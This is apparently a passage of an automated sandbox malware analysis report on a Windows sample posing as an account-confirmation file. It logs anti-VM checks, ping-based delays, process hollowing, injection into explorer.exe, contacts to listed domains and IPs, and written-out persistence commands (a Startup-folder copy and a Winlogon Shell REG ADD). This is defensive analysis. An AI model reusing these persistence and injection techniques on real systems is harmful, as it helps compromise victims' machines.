          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Uses ping.exe to sleep
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 13
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 12
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 12
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 13 Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 12 Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 12 Jump to behavior
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmd.exeRDTSC instruction interceptor: First address: 0000000000A38604 second address: 0000000000A3860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 0000000000B08604 second address: 0000000000B0860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 0000000000B0898E second address: 0000000000B08994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmd.exeRDTSC instruction interceptor: First address: 0000000000A3898E second address: 0000000000A38994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exe TID: 3996Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exe TID: 2268Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exe TID: 6068Thread sleep time: -1844674407370954s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exe TID: 4896Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exe TID: 4104Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe TID: 3544Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe TID: 3424Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe TID: 3092Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe TID: 6568Thread sleep time: -1844674407370954s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe TID: 6080Thread sleep count: 164 > 30
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe TID: 5824Thread sleep time: -30000s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe TID: 6152Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeFile opened: C:\Users\user\AppData\Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeFile opened: C:\Users\user\Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
          Source: Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.359205556.0000000002370000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000002.423797214.0000000002F90000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VBoxTray
          Source: explorer.exe, 00000024.00000000.597859283.00000000086C9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: java.exe, 0000001F.00000002.576422912.00000000030C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware VGAuth
          Source: java.exe, 0000001F.00000002.576422912.00000000030C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: sandboxierpcss#SOFTWARE\VMware, Inc.\VMware VGAuth
          Source: java.exe, 0000001E.00000002.575090256.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000001F.00000002.576422912.00000000030C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VBoxTrayme
          Source: explorer.exe, 00000024.00000000.598150341.0000000008778000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
          Source: Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.358867818.000000000079F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllconn
          Source: explorer.exe, 00000024.00000000.590118905.00000000067C2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000024.00000000.597859283.00000000086C9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
          Source: explorer.exe, 00000024.00000000.590118905.00000000067C2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
          Source: java.exe, 0000001E.00000002.575090256.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000001F.00000002.576422912.00000000030C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VBoxTraym
          Source: explorer.exe, 00000024.00000000.597859283.00000000086C9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.athletes4africa.biz
          Source: C:\Windows\explorer.exeNetwork Connect: 212.123.41.108 80
          Source: C:\Windows\explorer.exeNetwork Connect: 15.197.142.173 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.98.99.30 80
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.21.198 80
          Source: C:\Windows\explorer.exeDomain query: www.feasible-weld.com
          Source: C:\Windows\explorer.exeDomain query: www.sturgisbrews.com
          Source: C:\Windows\explorer.exeDomain query: www.navairahotels.club
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeDomain query: www.aireapartmentsmsp.com
          Source: C:\Windows\explorer.exeDomain query: www.balderzone.com
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection unmapped: C:\Windows\SysWOW64\wlanext.exe base address: B30000
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection unmapped: C:\Windows\SysWOW64\cmd.exe base address: D80000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
          Writes to foreign memory regions
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeMemory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeMemory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 401000
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeMemory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: CB6008
          Injects a PE file into a foreign processes
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeMemory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeThread register set: target process: 3352
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeThread register set: target process: 3352
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeThread register set: target process: 3352
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeThread register set: target process: 3352
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c ping 127.0.0.1 -n 12 > nul && copy "C:\Users\user\AppData\Local\Temp\java.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe" && ping 127.0.0.1 -n 12 > nul && "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c ping 127.0.0.1 -n 12 > nul && copy "C:\Users\user\AppData\Local\Temp\java.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe" && ping 127.0.0.1 -n 12 > nul && "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c ping 127.0.0.1 -n 13 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe,Jump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess created: C:\Users\user\AppData\Local\Temp\java.exe "C:\Users\user\AppData\Local\Temp\java.exe" Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 13 Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe,"Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c ping 127.0.0.1 -n 12 > nul && copy "C:\Users\user\AppData\Local\Temp\java.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe" && ping 127.0.0.1 -n 12 > nul && "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 12 Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 12 Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
          Source: explorer.exe, 00000024.00000000.614224490.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000024.00000000.572180257.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000024.00000000.575273577.0000000000B68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman\Pr
          Source: explorer.exe, 00000024.00000000.573575729.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000024.00000000.612007101.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000024.00000000.576999084.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000024.00000000.614818707.00000000011E0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000024.00000000.589551164.0000000005E10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000024.00000000.573575729.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000024.00000000.612007101.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000024.00000000.576999084.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000024.00000000.614818707.00000000011E0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000024.00000000.573575729.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000024.00000000.612007101.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000024.00000000.576999084.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000024.00000000.614818707.00000000011E0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000024.00000000.573575729.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000024.00000000.612007101.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000024.00000000.576999084.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000024.00000000.614818707.00000000011E0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000024.00000000.601174437.0000000008778000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000024.00000000.624682993.0000000008778000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000024.00000000.598150341.0000000008778000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWndh
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
